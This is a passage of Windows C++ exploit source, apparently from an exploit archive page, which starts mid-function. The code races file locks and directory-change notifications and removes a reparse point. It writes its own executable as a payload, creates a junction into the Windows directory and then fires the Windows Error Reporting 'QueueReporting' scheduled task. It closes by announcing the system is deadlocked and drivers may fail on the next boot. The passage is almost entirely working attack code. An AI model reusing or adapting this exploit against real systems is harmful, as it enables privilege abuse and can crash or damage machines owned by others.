printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", lockpath, stat);
return 1;
}

if (!LockFile(hlock1, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock file, error: %d\n", GetLastError());
return 1;
}
HANDLE heicar2 = NULL;
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&heicar2, GENERIC_READ, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return 1;
}

wchar_t newfpath[MAX_PATH] = { 0 };
wcscpy(newfpath, maindirname);
wcscat(newfpath, L"\\");

do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hdirtmp, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
wcscat(newfpath, &pfni->FileName[0]);
break;
} while (1);
if (!LockFile(heicar2, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock EICAR file, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hwin);

REPARSE_GUID_DATA_BUFFER rp_buffer = { 0 };
rp_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb2 = 0;
OVERLAPPED ov = { 0 };
HANDLE hevent = CreateEvent(NULL, FALSE, FALSE, NULL);
ov.hEvent = hevent;

DeviceIoControl(hdir, FSCTL_DELETE_REPARSE_POINT, &rp_buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
nullptr, 0, &cb2, &ov);
CloseHandle(ov.hEvent);

printf("[*] Stage 8: Writing payload...\n");

HANDLE htempfile = NULL;
UNICODE_STRING _newfpath = { 0 };
RtlInitUnicodeString(&_newfpath, newfpath);
OBJECT_ATTRIBUTES newfpathobjattr = { 0 };
InitializeObjectAttributes(&newfpathobjattr, &_newfpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&htempfile, GENERIC_READ | GENERIC_WRITE | DELETE, &newfpathobjattr, &iostat,
NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", newfpath, stat);
return 1;
}

HMODULE module = GetModuleHandle(NULL);
wchar_t mx[MAX_PATH] = { 0 };
GetModuleFileName(module, mx, MAX_PATH);

HANDLE hself = CreateFile(mx, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hself || hself == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open current executable, error: %d\n", GetLastError());
return 1;
}

DWORD readbytes = 0;
LARGE_INTEGER li = { 0 };
GetFileSizeEx(hself, &li);
void* exebuff = malloc(li.QuadPart);

if (!ReadFile(hself, exebuff, li.QuadPart, &readbytes, NULL)) {
printf("[!] Failed to read current executable binary, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hself);

readbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);

if (WriteFile(htempfile, exebuff, li.QuadPart, &readbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write payload file, error: %d\n", GetLastError());
return 1;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
free(exebuff);

printf("[*] Stage 9: Finalizing and detaching...\n");
CloseHandle(heicar2);
MoveToTempDir(htempfile);
MoveToTempDir(hdirtmp);
MoveToTempDir(hdir);
HANDLE hparent = NULL;
UNICODE_STRING _workdir = { 0 };
RtlInitUnicodeString(&_workdir, workdir2);
OBJECT_ATTRIBUTES workdirobjattr = { 0 };
InitializeObjectAttributes(&workdirobjattr, &_workdir, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };

stat = NtCreateFile(&hparent, FILE_WRITE_ATTRIBUTES, &workdirobjattr, &iostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN,
FILE_DIRECTORY_FILE, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", workdir2, stat);
return 1;
}
wchar_t __tmp[MAX_PATH] = { 0 };
GetWindowsDirectory(__tmp, MAX_PATH);
wchar_t dest[MAX_PATH] = { L"\\??\\" };
wcscat(dest, __tmp);

if (!CreateJunction(hparent, dest)) {
return 1;
}
CloseHandle(hparent);
CloseHandle(hdirtmp);
CloseHandle(hdir);
DetachVirtualDisk(hvirtdisk, DETACH_VIRTUAL_DISK_FLAG_NONE, NULL);
CloseHandle(hvirtdisk);
WaitForSingleObject(hthread, INFINITE);
CloseHandle(hthread);
CloseHandle(htempfile);
g_poseidonexit = true;
Sleep(500);
printf("[*] Stage 11: Triggering persistence...\n");

HRESULT hr = S_OK;
ITaskService* pTaskSvc = NULL;
hr = CoInitialize(NULL);
if (SUCCEEDED(hr)) {
hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER,
IID_ITaskService, (void**)&pTaskSvc);
if (FAILED(hr)) {
printf("[!] Failed to initialize task scheduler COM server.\n");
CoUninitialize();
return 1;
}
} else {
return 1;
}
hr = pTaskSvc->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
if (hr) {
printf("[!] Failed to connect to task scheduler service, error: 0x%0.8X\n", hr);
return 1;
}
ITaskFolder* taskfolder = NULL;
hr = pTaskSvc->GetFolder((BSTR)L"\\Microsoft\\Windows\\Windows Error Reporting", &taskfolder);
if (hr) {
printf("[!] Failed to get task scheduler folder, error: 0x%0.8X\n", hr);
return 1;
}
IRegisteredTask* taskex = NULL;
hr = taskfolder->GetTask((BSTR)L"QueueReporting", &taskex);
if (hr) {
printf("[!] Failed to obtain task object, error: 0x%0.8X\n", hr);
return 1;
}
IRunningTask* runningtask = NULL;
hr = taskex->Run(_variant_t(), &runningtask);
if (hr) {
printf("[!] Failed to run scheduled task, error: 0x%0.8X\n", hr);
return 1;
}
if (!ConnectNamedPipe(hpipe, NULL)) {
printf("[!] ConnectNamedPipe failed, error: %d\n", GetLastError());
return 1;
}
printf("\n============================================================\n");
printf(" [!!] EXPLOIT SUCCESSFUL\n");
printf(" System should now be in a frozen/deadlocked state.\n");
printf(" Some drivers may fail to load on next boot.\n");
printf("============================================================\n\n");
runningtask->Release();
taskex->Release();
taskfolder->Release();
pTaskSvc->Release();
CoUninitialize();
return 0;
}



Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.